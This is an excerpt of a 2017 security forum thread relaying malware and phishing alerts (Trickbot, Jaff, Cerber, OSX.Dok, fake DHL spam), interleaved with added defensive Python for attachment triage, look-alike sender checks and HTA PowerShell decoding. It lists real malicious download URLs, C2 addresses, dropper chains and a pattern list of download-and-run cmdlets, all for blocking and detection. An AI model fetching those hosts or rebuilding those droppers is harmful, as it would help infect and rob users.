The National Cybersecurity and Communications Integration Center (NCCIC) has become aware of an emerging sophisticated campaign, occurring since at least May 2016, that uses multiple malware implants. Initial victims have been identified in several sectors, including Information Technology, Energy, Healthcare and Public Health, Communications, and Critical Manufacturing.
According to preliminary analysis, threat actors appear to be leveraging stolen administrative credentials (local and domain) and certificates, along with placing sophisticated malware implants on critical systems. Some of the campaign victims have been IT service providers, where credential compromises could potentially be leveraged to access customer environments. Depending on the defensive mitigations in place, the threat actor could possibly gain full access to networks and data in a way that appears legitimate to existing monitoring tools.
Although this activity is still under investigation, NCCIC is sharing this information to provide organizations information for the detection of potential compromises within their organizations.
NCCIC will update this document as information becomes available.
For a downloadable copy of this report and listings of IOCs, see:
> https://www.us-cert....17-093-01C.xlsx
IOCs (.xlsx)

> https://www.helpnets...ttack-campaign/
April 28, 2017
___

Macs - OSX.Dok malware intercepts web traffic
> https://blog.malware...ts-web-traffic/
April 28, 2017 - "Most Mac malware tends to be unsophisticated. Although it has some rather unpolished and awkward aspects, a new piece of Mac malware, dubbed 'OSX.Dok', breaks out of that typical mold. OSX.Dok, which was discovered by Check Point*, uses sophisticated means to monitor — and potentially alter — all HTTP and HTTPS traffic to and from the infected Mac. This means that the malware is capable, for example, of capturing account credentials for any website users log into, which offers many opportunities for theft of cash and data. Further, OSX.Dok could modify the data being sent and received for the purpose of -redirecting- users to malicious websites in place of legitimate ones...
* http://blog.checkpoi...-https-traffic/
Distribution method: OSX.Dok comes in the form of a file named Dokument.zip, which is found being -emailed- to victims in -phishing- emails. Victims primarily are located in Europe...
Removal: Removal of the malware can be accomplished by simply removing the two aforementioned LaunchAgents files, but there are many leftovers and modifications to the system that -cannot- be as easily reversed...
Consumers: Malwarebytes Anti-Malware for Mac will detect the important components of this malware as OSX.Dok, disabling the active infection. However, when it comes to the other changes that are not easily reversed, which introduce vulnerabilities and potential behavior changes, additional measures will be needed. For people who don’t know their way around in the Terminal and the arcane corners of the system, it would be wise to seek the assistance of an expert, or erase the hard drive and restore the system from a backup made prior to infection.
Businesses: The impact on business could be much more severe, as it could expose information that could allow an attacker to gain access to company resources. For example, consider the potential damage if, while infected, you visited an internal company page that provided instructions for how to connect to the company VPN and access internal company services. The malware would have sent all that information to the malicious proxy server. If you have been infected by this malware in a business environment, you should consult with your IT department, so they can be aware of the risks and begin to mitigate them."
(More detail at the malwarebytes -and- checkpoint URLs above.)
 



Edited by AplusWebMaster, 28 April 2017 - 01:10 PM.

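The same masquerade runs through the posts above: a zip that extracts to a .pdf.js double extension, and a "download" named .png that is really a renamed .exe. The Python below is an added example (not code from the quoted blogs or from this forum) that triages an attachment by name and by magic bytes, and opens zips to triage what they hold; every name and byte string it uses is constructed.

```python
"""Attachment triage: flag double extensions (.pdf.js) and files whose
content does not match the extension (a 'png' that starts with 'MZ').
Added example; the sample names and bytes below are constructed."""
import io
import zipfile

# Extensions Windows hands to wscript/cscript, mshta or the PE loader.
EXECUTABLE_EXTENSIONS = {"js", "jse", "vbs", "vbe", "wsf", "hta", "exe",
                         "scr", "jar", "ps1", "cmd", "bat"}
# Extensions used as the decoy half of a double extension.
DECOY_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg",
                    "png", "gif", "txt"}

# Leading bytes that identify what a file really is, whatever its name.
MAGIC = [
    (b"MZ", "pe"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"%PDF", "pdf"),
    (b"PK\x03\x04", "zip"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),   # legacy .doc / .xls
    (b"\xff\xd8\xff", "jpeg"),
]
# What the extension claims the content should be.
EXTENSION_TO_TYPE = {"exe": "pe", "scr": "pe", "dll": "pe", "png": "png",
                     "pdf": "pdf", "zip": "zip", "docx": "zip", "xlsx": "zip",
                     "doc": "ole", "xls": "ole", "jpg": "jpeg", "jpeg": "jpeg"}


def sniff_type(data):
    """Identify content by magic bytes; 'unknown' if nothing matches."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def check_name(name):
    """Findings based on the file name alone."""
    findings = []
    exts = name.lower().split(".")[1:]
    if not exts:
        return findings
    last = exts[-1]
    if last in EXECUTABLE_EXTENSIONS:
        findings.append("executable extension ." + last)
    if len(exts) >= 2 and exts[-2] in DECOY_EXTENSIONS and last in EXECUTABLE_EXTENSIONS:
        findings.append("double extension .%s.%s masquerading as %s"
                        % (exts[-2], last, exts[-2]))
    return findings


def check_content(name, data):
    """Findings from comparing the claimed extension with the real content."""
    findings = []
    ext = name.lower().rsplit(".", 1)[-1] if "." in name else ""
    actual = sniff_type(data)
    expected = EXTENSION_TO_TYPE.get(ext)
    if expected is not None and actual != expected:
        findings.append("content is %s but name claims .%s" % (actual, ext))
    if actual == "pe" and expected != "pe":
        findings.append("PE executable with non-executable name")
    return findings


def triage(name, data):
    """All findings for one file; zip archives are opened and their
    members triaged too, since the malspam wraps the .js in a zip."""
    findings = check_name(name) + check_content(name, data)
    if sniff_type(data) == "zip" and zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.namelist():
                for finding in triage(member, zf.read(member)):
                    findings.append("%s: %s" % (member, finding))
    return findings


# Constructed samples (not the real malware): a stub that merely starts
# with the PE 'MZ' signature, and a zip holding two '.pdf.js' members.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60


def build_sample_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("DECLARATION (FORM).PDF.js", "// constructed, does nothing")
        zf.writestr("TYPE OF GOODS DOC.pdf.js", "// constructed, does nothing")
    return buf.getvalue()


if __name__ == "__main__":
    for name, data in [("60c5776c175c54d2.png", FAKE_PE),
                       ("TYPE OF GOODS_DECLARATION.zip", build_sample_zip()),
                       ("logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8)]:
        print(name, "->", triage(name, data) or "clean")
```

A macro-laden .doc with genuine OLE bytes passes this check on purpose: name and magic triage catches renamed binaries and script droppers, not macro content, which needs a separate macro scan.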

#1921 AplusWebMaster

Posted 01 May 2017 - 05:52 AM

FYI...

Fake 'MoneyGram' SPAM - delivers new java Adwind
- https://myonlinesecu...adwind-version/
1 May 2017 - "... -fake- financial themed emails containing java adwind or Java Jacksbot attachments... previously mentioned many of these HERE[1]... Today’s has a slightly different subject and email content to previous ones...
1] https://myonlinesecu.../?s=java adwind

Screenshot: https://myonlinesecu...m-MoneyGram.png

Updated Guidelines from MG.jar (480 kb) -  Current Virus total detections 2/58*. MALWR **... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493604843/

** https://malwr.com/an...TA1NTM5MWZjMjE/
 




#1922 AplusWebMaster

Posted 02 May 2017 - 05:26 AM

FYI...

Fake 'DHL' SPAM - js script
- http://blog.dynamoo....8878382814.html
2 May 2017 - "... another -fake- DHL message leading to an evil .js script.
    From: DHL Parcel UK [redacted]
    Sent: 02 May 2017 09:30
    To: [redacted]
    Subject: DHL Shipment 458878382814 Delivered
    You can track this order by clicking on the following link:
    https ://www .dhl .com/apps/dhltrack/?action=track&tracknumbers=458878382814&language=en&opco=FDEG&clientype=ivother
    Please do not respond to this message. This email was sent from an unattended mailbox. This report was generated at approximately 08:15 am CDT on 02/05/2017.
    All weights are estimated.
    The shipment is scheduled for delivery on or before the scheduled delivery displayed above. DHL does not determine money-back guarantee or delay claim requests based on the scheduled delivery. Please see the DHL Service Guide for terms and conditions of service, including the DHL Money-Back Guarantee, or contact your DHL customer support representative.
    This tracking update has been sent to you by DHL on behalf of the Requestor [redacted]. DHL does not validate the authenticity of the requestor and does not validate, guarantee or warrant the authenticity of the request, the requestor's message, or the accuracy of this tracking update.
    Standard transit is the date the package should be delivered by, based on the selected service, destination, and ship date. Limitations and exceptions may apply. Please see the DHL Service Guide for terms and conditions of service, including the DHL Money-Back Guarantee, or contact your DHL Customer Support representative.


In this case the link goes to parkpaladium .com/DHL24/18218056431/ and downloads a file DHL-134843-May-02-2017-55038-8327373-1339347112.js. According to Malwr* and Hybrid Analysis** the script downloads a binary from micromatrices .com/qwh7zxijifxsnxg20mlwa/ (77.92.78.38 - UK2, UK) and then subsequently attempts communication with
75.25.153.57 (AT&T, US)
79.170.95.202 (XL Internet Services, Netherlands)
87.106.148.126 (1&1, Germany)
78.47.56.162 (Mediaforge, Germany)
81.88.24.211 (dogado GmbH, Germany)
92.51.129.235 (Host Europe, Germany)
74.50.57.220 (RimuHosting, US)
The dropped binary has a VirusTotal detection rate of 10/60***.
Recommended blocklist:
77.92.78.38
75.25.153.57
79.170.95.202
87.106.148.126
78.47.56.162
81.88.24.211
92.51.129.235
74.50.57.220
"
* https://malwr.com/an...jQyOTA1ZjM3MjM/
Hosts
77.92.78.38
79.170.95.202


** https://www.hybrid-a...vironmentId=100


*** https://virustotal.c...sis/1493719562/
mlgih3wgw.exe
___

Fake 'Secure email' SPAM - delivers Trickbot
- https://myonlinesecu...banking-trojan/
2 May 2017 - "An email with the subject of 'Secure email message' pretending to come from Companies House but actually coming from a look-alike domain <noreply@ cp-secure-message .co.uk> with a malicious word doc attachment is today’s latest spoof of a well known company, bank or public authority delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecu...ure-message.png

SecureMessage.doc - Current Virus total detections 5/55*. Payload Security** shows a download from
 http ://gestionbd .com/fr/QMjJrcCrHGW9sb6uF.png which of course is -not- an image file but a renamed .exe file that gets renamed to Epvuyf.exe and autorun (VirusTotal 8/61***)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493724795/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
216.138.226.110
50.19.97.123
186.208.111.188
82.146.94.86


*** https://www.virustot...sis/1493725297/
Epvuyf.exe

gestionbd .com: 216.138.226.110: https://www.virustot...10/information/
> https://www.virustot...15290/analysis/
___

Cerber Ransomware - evolution
- http://blog.trendmic...ware-evolution/
May 2, 2017 - "... enterprises and individual users alike are taking the brunt, with the U.S. accounting for much of Cerber’s impact. We’ve also observed Cerber’s adverse impact among organizations in education, manufacturing, public sector, technology, healthcare, energy, and transportation industries:
Top countries affected by Cerber:
> https://blog.trendmi...4/cerber6-1.jpg
Infection chain of Cerber Version 6:
> https://blog.trendmi...4/cerber6-2.jpg
Adding a time delay in the attack chain enables Cerber to elude traditional sandboxes, particularly those with time-out mechanisms or that wait for the final execution of the malware. Other JS files we saw ran powershell.exe (called by wscript.exe) whose parameter is a PowerShell script — the one responsible for downloading the ransomware and executing it in the system:
Sample Cerber 6-carrying spam email posing as a public postal service agency:
> https://blog.trendmi...4/cerber6-4.jpg
... Cerber was updated with the capability to integrate the infected system into botnets, which were employed to conduct distributed denial of service (DDoS) attacks. By July, a spam campaign was seen abusing cloud-based productivity platform Office 365 through Office documents embedded with a malicious macro that downloads and helps execute the ransomware. Exploit kits are also a key element in Cerber’s distribution. Cerber-related malvertising campaigns were observed in 2016 diverting users to Magnitude, Rig, and Neutrino — which has since gone private — exploit kits that target system or software vulnerabilities. This year, we’re seeing relatively new player Sundown exploit kit joining the fray... Cerber’s distribution methods remain consistent, we’ve seen newer variants delivered as self-extracting archives (SFX package) containing malicious Visual Basic Script (.VBS) and Dynamic-link library (.DLL) files that execute a rather intricate attack chain compared to other versions... it’s one of the signs of things to come for Cerber. It is not far-fetched for Cerber to emulate how Locky constantly changed email file attachments in its spam campaigns by expanding arrival vectors beyond JS files and PowerShell scripts — from JScript to HTML Application (.HTA) and compressed binary files (.BIN) — and exploiting file types that aren’t usually used to deliver malware... we’re currently seeing .HTA files being leveraged by a campaign that uses Cerber as payload. Our initial analysis indicates that the campaign, which we began monitoring by the third week of April, appears to be targeting Europe. We also found the same campaign attacking two Latin American countries. This campaign is notable for displaying Cerber’s ransom note in the local language of the infected system. It uses an .HTA file to show the online message/ransom note as well as detect the local language to be displayed...
Cerber’s evolution reflects the need for organizations and end users to be aware of today’s constantly evolving threats. End users risk losing money and their important personal files to ransomware; it also threatens organizations’ business operations, reputation, and bottom line. While there is no silver bullet against ransomware, keeping systems up-to-date, taking caution against unsolicited and suspicious emails, regularly backing up important files, and cultivating a culture of cybersecurity in the workplace are just some of the best practices for defending against ransomware. IT/system administrators and information security professionals can further defend their organization’s perimeter by incorporating additional layers of security against suspicious files, processes, applications, and network activity that can be exploited and leveraged by ransomware. Users and businesses can also benefit from a multilayered approach to security that covers the gateway, endpoints, networks, and servers..."
(More detail at the trendmicro URL above.)
 



Edited by AplusWebMaster, 02 May 2017 - 02:57 PM.

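The Trickbot posts share one tell: the display name says HMRC, Companies House or a bank, but the sending domain is a look-alike (govsecure .co.uk, cp-secure-message .co.uk) rather than the brand's own. The Python below is an added example (not code from the quoted blogs or from this forum) that checks a From: header for that mismatch; the brand allowlist and the public-suffix subset it uses are assumptions for the example, not authoritative lists.

```python
"""Look-alike sender check: the display name or address invokes a brand
but the registrable domain is not one the brand actually mails from.
Added example; the allowlist below is an assumption, not an authoritative
list, and a real deployment would load it from policy."""
import re
from email.utils import parseaddr

# Public suffixes that take two labels (subset, assumed for this example).
TWO_LABEL_SUFFIXES = {"co.uk", "gov.uk", "org.uk", "ac.uk", "com.au"}

# (brand, keywords that invoke it, registrable domains it really uses)
BRANDS = [
    ("HMRC", ["hmrc", "hm revenue", "revenue & customs"], {"gov.uk"}),
    ("Companies House", ["companies house"], {"gov.uk"}),
    ("Lloyds Bank", ["lloyds"], {"lloydsbank.com", "lloydsbank.co.uk"}),
    ("Booking.com", ["booking"], {"booking.com"}),
    ("DHL", ["dhl"], {"dhl.com", "dhl.co.uk"}),
]


def registrable_domain(host):
    """'mail.hmrc.gov.uk' -> 'hmrc.gov.uk'; 'sgs.bookings.com' -> 'bookings.com'."""
    labels = host.lower().strip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def normalize(text):
    """Lower-case and strip everything but letters and digits, so
    'gov-secure', 'govsecure' and 'Gov Secure' compare equal."""
    return re.sub(r"[^a-z0-9]", "", text.lower())


def is_allowed(domain, allowed):
    return any(domain == a or domain.endswith("." + a) for a in allowed)


def check_sender(from_header):
    """Return the brands the sender claims to be without using their domain.
    An empty list means 'no look-alike seen', not 'genuine': an exact
    spoof of support@dhl.com passes here and needs SPF/DKIM/DMARC."""
    display, addr = parseaddr(from_header)
    if "@" not in addr:
        return []
    domain = registrable_domain(addr.rsplit("@", 1)[1])
    haystack = normalize(display) + " " + normalize(addr)
    flagged = []
    for brand, keywords, allowed in BRANDS:
        if any(normalize(k) in haystack for k in keywords) and not is_allowed(domain, allowed):
            flagged.append(brand)
    return flagged


# Constructed From: headers modelled on the senders quoted in the posts
# (the posts defang them with spaces; these are the undefanged forms).
SAMPLES = [
    "HM Revenue & Customs <GSRPCommunication@govsecure.co.uk>",
    "Companies House <noreply@cp-secure-message.co.uk>",
    "Lloyds Bank <secure@lloydsbankdocuments.com>",
    "Booking <noreply@sgs.bookings.com>",
    "DHL Customer Support <support@dhl.com>",
]

if __name__ == "__main__":
    for header in SAMPLES:
        print(header, "->", check_sender(header) or "no look-alike seen")
```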

#1923 AplusWebMaster

Posted 04 May 2017 - 05:49 AM

FYI...

Fake 'PAYMENT' SPAM - delivers malware
- https://myonlinesecu...e-link-exploit/
4 May 2017 - "An email with the subject of 'PAYMENT FOR YAREED' (I am assuming random names) coming from random names and email addresses with a malicious word doc attachment delivers some sort of malware via the CVE-2017-0199 word/rtf embedded ole -link- exploit ...

Screenshot: https://myonlinesecu...-for-yareed.png

PO NO- YAREED-2017.doc (30kb) - Current Virus total detections 16/56*. Payload Security** shows a download of an hta file from
 http ://alguemacultural .com/enessss.hta (VirusTotal 0/52***) (Payload Security[4])
The smaller second word doc also contacts the -same- location & downloads the -same- file
 PO NO- YAREED-2017.doc (7kb) - Current Virus total detections 16/55[5] | Payload Security[6]
... The hta file is an executable html file that internet explorer -will- run... which is an encoded powershell script... which when decoded looks like this which downloads the genuine putty.exe from
 https ://the.earth .li/~sgtatham/putty/0.68/w32/putty.exe which is -renamed- to nextobad.exe and autorun...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493869646/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
174.136.152.24

*** https://www.virustot...sis/1493870176/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
46.43.34.31

5] https://www.virustot...sis/1493869660/

6] https://www.hybrid-a...vironmentId=100
Contacted Hosts
174.136.152.24

alguemacultural .com: 174.136.152.24: https://www.virustot...24/information/
> https://www.virustot...8dfbf/analysis/

the.earth .li: 46.43.34.31: https://www.virustot...31/information/
> https://www.virustot...ffaa1/analysis/
___

Fake 'document' SPAM - delivers malware
- https://myonlinesecu...ude-of-malware/
4 May 2017 - "... An email with the subject using -random- characters pretending to come from somebody that the recipient knows with a -link- to -download- a malicious word doc that delivers some sort of multi-stage malware...

Screenshot: https://myonlinesecu...RQ-03681348.png

ZPDML-36-45320-document-May-04-2017.doc - Current Virus total detections 7/56*. Payload Security** shows a download  from -numerous- different locations via powershell which gives 23905.exe (VirusTotal ***) (Payload Security[4])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493873579/

** https://www.hybrid-a...vironmentId=100


*** https://www.virustot...sis/1493852073/

4] https://www.hybrid-a...vironmentId=100

___

Fake 'BACs Documents' SPAM - delivers Trickbot
- https://myonlinesecu...banking-trojan/
4 May 2017 - "An email with the subject of 'Important BACs Documents' pretending to come from Lloyds Bank but actually coming from a look-alike domain <secure@ lloydsbankdocuments .com> with a malicious word doc attachment... delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecu...S-documents.png

BACs.doc - Current Virus total detections 6/56*. Payload Security** shows a download from
 http ://www .247despatch .co.uk/grabondanods.png which of course is -not- an image file but a renamed .exe file that gets renamed to Gehsp.exe and autorun (VirusTotal 12/61***)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493896398/

** https://www.hybrid-a...vironmentId=100


*** https://www.virustot...sis/1493896665/

247despatch .co.uk: 91.102.64.132: https://www.virustot...32/information/
> https://www.virustot...96ed9/analysis/
___

Fake multiple subjects/attachments SPAM - delivers Trojan via js files
- https://myonlinesecu...n-via-js-files/
4 May 2017 - "... There have been numerous -different- subjects and campaign themes... some of them here:
    'Our reference: 733092244' pretending to come from Eli Murchison <Hughchaplin@ yahoo .de>
    'Hotel booking confirmation (Id:022528)' pretending to come from Booking <noreply@ sgs.bookings .com>
    'DHL Shipment Notification : 0581957002' pretending to come from DHL Customer Support <support@ dhl .com>
    'Re: img' pretending to come from seisei-1@ yahoo .de
    'scan' pretending to come from stephen@ arrakis .es
Some of the file attachment names, -all- extracting to .js files, include:
    reservation details 9I2XIIWTM.zip (VirusTotal [1]| Payload Security[2])
    info-DOMESTIC_EXPRESS Pickup Date2017-05-04.zip (VirusTotal [3]| Payload Security[4])
    img-A34401586965107279 jpeg.zip (VirusTotal [5]| Payload Security[6])
    CCPAY9196902168.zip (VirusTotal [7]| Payload Security[8])
    Scan P.1 0967945763.zip which is slightly different because it extracts -2- different .js files
      (VirusTotal[9]| Payload Security[10]) (VirusTotal[11]| Payload Security[12])

Screenshots[1]: https://myonlinesecu...n-Id-022528.png

2] https://myonlinesecu...e-733092244.png

3] https://myonlinesecu...-0581957002.png

4] https://myonlinesecu...7/05/re_img.png

5] https://myonlinesecu.../birch_scan.png

-All- of these download the -same- malware from
 http ://horcor .com/ese.tf -or-
 http ://www .nemcicenadhanou .cz/nvdtime.prs which are -renamed- .exe files that are -renamed- to an .exe file and autorun (VirusTotal[13]| Payload Security[14])... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustot...sis/1493904287/

2] https://www.hybrid-a...vironmentId=100

13] https://www.virustot...sis/1493900783/

14] https://www.hybrid-a...vironmentId=100

horcor .com: 47.91.92.64: https://www.virustot...64/information/
> https://www.virustot...9d426/analysis/
Malicious site

nemcicenadhanou .cz: Could not find an IP address for this domain name. [May have been taken down...]
 



Edited by AplusWebMaster, 04 May 2017 - 11:27 AM.

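The 'PAYMENT' post above describes an .hta that carries an encoded PowerShell script, which when decoded shows the download location. The Python below is an added example (not code from the quoted blogs or from this forum) of the static step an analyst does by hand there: find the powershell -e launch in the HTA, decode the UTF-16LE base64 payload, and pull out URLs and fetch/launch cmdlets for blocking and hunting. The HTA and payload it runs on are constructed and benign, with a placeholder URL.

```python
"""Static look inside an .hta: find 'powershell -e <base64>' launches,
decode the UTF-16LE payload, and pull out URLs and suspicious cmdlets.
Added example; the HTA and its payload are constructed and benign."""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; this
# regex covers the common ones seen in droppers.
ENCODED_RE = re.compile(
    r"-(?:encodedcommand|encoded|enco|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)
# Cmdlets and .NET calls that fetch or launch content; a hit is a lead
# for the analyst, not proof of malice.
INDICATORS = ["DownloadFile", "DownloadString", "Invoke-WebRequest",
              "Invoke-Expression", "Start-Process", "Net.WebClient"]


def decode_encoded_command(b64):
    """-EncodedCommand takes base64 of the UTF-16LE script text."""
    raw = base64.b64decode(b64, validate=True)
    return raw.decode("utf-16-le", errors="replace")


def scan_indicators(script):
    lowered = script.lower()
    return [i for i in INDICATORS if i.lower() in lowered]


def analyze_hta(text):
    """Decode every encoded PowerShell launch in the HTA text and collect
    URLs and indicators from both the raw file and the decoded scripts."""
    decoded = []
    for b64 in ENCODED_RE.findall(text):
        try:
            decoded.append(decode_encoded_command(b64))
        except (ValueError, UnicodeDecodeError):
            continue   # not valid base64: leave it for manual review
    corpus = text + "\n" + "\n".join(decoded)
    urls = sorted(set(URL_RE.findall(corpus)))
    return {"encoded_commands": decoded, "urls": urls,
            "indicators": scan_indicators(corpus)}


def encode_command(script):
    """Inverse of decode_encoded_command, used only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: an HTA whose JScript launches an encoded PowerShell
# one-liner. The decoded script only echoes a placeholder URL.
SAMPLE_PS = ("$u = 'http://placeholder.invalid/sample.png'; "
             "Write-Output \"constructed sample, would fetch $u\"")
SAMPLE_HTA = """<html><head><HTA:APPLICATION id="app" windowstate="minimize"/>
<script language="JScript">
new ActiveXObject("WScript.Shell").Run("powershell -nop -w hidden -e %s", 0);
</script></head><body></body></html>""" % encode_command(SAMPLE_PS)

if __name__ == "__main__":
    report = analyze_hta(SAMPLE_HTA)
    for cmd in report["encoded_commands"]:
        print("decoded:", cmd)
    print("urls:", report["urls"])
    print("indicators:", report["indicators"] or "none")
```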

#1924 AplusWebMaster

Posted 08 May 2017 - 07:04 AM

FYI...

Fake 'Payment Advice' SPAM - delivers malware
- https://myonlinesecu...livers-malware/
8 May 2017 - "... an email with the subject of 'FW: Payment Advice – Advice Ref:[G32887529930] / Priority payment / Customer Ref:[03132394]' pretending to come from HSBC Advising Service <050717.advisingservice@ mail .com>....

Screenshot: https://myonlinesecu...dvice-email.png

Payment_Advice.zip: Extracts to: Payment_Advice.scr - Current Virus total detections 32/62*. MALWR**...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1494218279/

** https://malwr.com/an...zQwYTlmZGRkMzQ/
___

Fake 'update your mailbox' - phish
- https://myonlinesecu...-phishing-scam/
8 May 2017 - "... pretends to be a message from 'Email Support' to 'Update Your Mailbox'. Of course these do -not- come from Microsoft or Live .com but are -spoofed- to appear to come from them...

Screenshot: https://myonlinesecu...shing-email.png

If you follow the link inside the email you see a webpage looking like this:
 http ://www.mir-holoda .by/pic/fanc/en-gb/?email=jeremiah@ thespykiller .co.uk (where the email address the email was sent to is automatically inserted):
> https://myonlinesecu...05/mailbox1.png

After you input your password, you first get told “checking details” then “incorrect details” and are forwarded to an almost identical looking page where you can put it in again:
> https://myonlinesecu...05/mailbox2.png

> https://myonlinesecu...05/mailbox3.png

> https://myonlinesecu...05/mailbox4.png

... Don’t assume that all attempts are obvious. Watch for any site that invites you to enter ANY personal or financial information..."

mir-holoda .by: 91.149.189.125: https://www.virustot...25/information/
> https://www.virustot...48c26/analysis/
 




#1925 AplusWebMaster

Posted 11 May 2017 - 04:58 AM

FYI...

Fake 'pdf attachment' SPAM - delivers Locky/Dridex
- https://myonlinesecu...df-attachments/
11 May 2017 - "... well used email template with subjects varying widely; there are literally hundreds if not thousands of subjects. These generally deliver either Locky ransomware or Dridex banking Trojan.
    File_69348406
    PDF_9859
    Scan_2441975
    Document_11048
    Copy_9762
They -all- have a pdf attachment that drops a word doc with macros... all downloads from these locations which delivers an encrypted txt file that should be converted by the macro to a working .exe file but Payload security.... doesn’t seem able to convert it...
wipersdirect .com/f87346b
tending .info/f87346b
julian-g .ro/f87346b

I am being told this is a -new- ransomware called jaff ransomware*...
* https://twitter.com/...586080507424769
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."

wipersdirect .com: 108.165.22.125: https://www.virustot...25/information/
> https://www.virustot...49ec3/analysis/

tending .info: 80.75.98.151: https://www.virustot...51/information/
> https://www.virustot...35742/analysis/

julian-g .ro: 86.35.15.215: https://www.virustot...15/information/
> https://www.virustot...82654/analysis/
___

Fake 'DHL Statements' SPAM - delivers js malware
- https://myonlinesecu...livers-malware/
11 May 2017 - "... an email with the subject of '6109175302 Statements x Requests Required' (random numbers) pretending to come from bgyhub@ dhl .com with a zip attachment containing -2- differently named .js files which delivers some sort of malware...

Screenshot: https://myonlinesecu...ts-Required.png

TYPE OF GOODS_DECLARATION.zip: Extracts to: DECLARATION (FORM).PDF.js -and- TYPE OF GOODS DOC.pdf.js
 Current Virus total detections [1] [2]:  Payload Security [3] [4] shows a download from one or both of these locations:
  http ://schuetzen-neusalz .de/images/banners/gbfont.se -or- http ://wersy .net/cuts.vs which is renamed and autorun by the script (VirusTotal [5]) (Payload Security[6])... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustot...sis/1494487534/

2] https://www.virustot...sis/1494487531/

3] https://www.hybrid-a...vironmentId=100

4] https://www.hybrid-a...vironmentId=100

5] https://www.virustot...sis/1494488118/

6] https://www.hybrid-a...vironmentId=100

schuetzen-neusalz .de: 85.13.146.159: https://www.virustot...59/information/
> https://www.virustot...cc5ce/analysis/

wersy .net: 217.29.53.99: https://www.virustot...99/information/
> https://www.virustot...0680e/analysis/
___

Malware spam with 'nm.pdf' attachment
- http://blog.dynamoo....attachment.html
11 May 2017 - "Currently underway is a malicious spam run with various subjects, for example:
Scan_5902
Document_10354
File_43359
Senders are random, and there is -no- body text. In -all- cases there is a PDF attached named nm.pdf with an MD5 of D4690177C76B5E86FBD9D6B8E8EE23ED -or- 6B305C5B59C235122FD8049B1C4C794D (and possibly more). Detection rates at VirusTotal are moderate [1] [2].
The PDF file contains an embedded Word .docm macro document. Hybrid Analysis [3] [4] is partly successful: it shows a run-time error for the malicious code, but it does demonstrate that the malicious .docm file is dropped, with a detection rate of 15/58[5].
Putting the .docm file back into Hybrid Analysis and Malwr [6] [7] shows the same sort of results, namely a download from:
easysupport .us/f87346b ...
UPDATE: A contact pointed out this Hybrid Analysis[X] which looks like basically the same thing, only in this sample the download seems to work. Note the references to "jaff" in the report, which -matches- this Tweet[8] about something called "Jaff ransomware".
That report also gives two other locations to look out for:
trialinsider .com/f87346b
fkksjobnn43 .org/a5/

This currently gives a recommended blocklist of:
47.91.107.213
trialinsider .com
easysupport .us
"
1] https://virustotal.c...sis/1494492097/

2] https://virustotal.c...sis/1494492251/

3] https://www.hybrid-a...vironmentId=100
Contacted Hosts
198.58.93.28 - easysupport .us
- https://www.virustot...28/information/
> https://www.virustot...de188/analysis/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
198.58.93.28 - easysupport .us

5] https://virustotal.c...sis/1494492613/

6] https://www.hybrid-a...vironmentId=100
198.58.93.28 - easysupport .us

> https://www.virustot...de188/analysis/

7] https://malwr.com/an...WY1NjU5ZDViNzk/

8] https://twitter.com/...597006363152385

X] https://www.hybrid-a...vironmentId=100
Contacted Hosts
107.154.168.227 - trialinsider .com
47.91.107.213 - fkksjobnn43 .org

trialinsider .com: 107.154.161.227: https://www.virustot...27/information/
> https://www.virustot...4291a/analysis/
107.154.168.227: https://www.virustot...27/information/
> https://www.virustot...4291a/analysis/

 

fkksjobnn43 .org: 47.91.107.213: https://www.virustot...13/information/
> https://www.virustot...4e012/analysis/
___

Fake 'DHL' SPAM - delivers Trojan
- https://myonlinesecu...banking-trojan/
11 May 2017 - "... an email with the subject of 'Fwd: DHL Redelivery Confirmation #574068024996' (random numbers) pretending to come from random companies, names and email addresses with a semi-random named zip attachment which delivers Ursnif banking Trojan...

Screenshot: https://myonlinesecu...-redelivery.png

request-redelivery-2017053299810.pdf.js - Current Virus total detections 1/57*. Payload Security** shows a download from one or both of these locations
  http ://schuetzen-neusalz .de/images/banners/gbfont.se -or- http ://wersy .net/cuts.vs
 which is -renamed- and autorun by the script (VirusTotal 9/62***) (Payload Security[4])... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1494500118/

** https://www.hybrid-a...vironmentId=100

*** https://www.virustot...sis/1494488118/

4] https://www.hybrid-a...vironmentId=100

schuetzen-neusalz .de: 85.13.146.159: https://www.virustot...59/information/
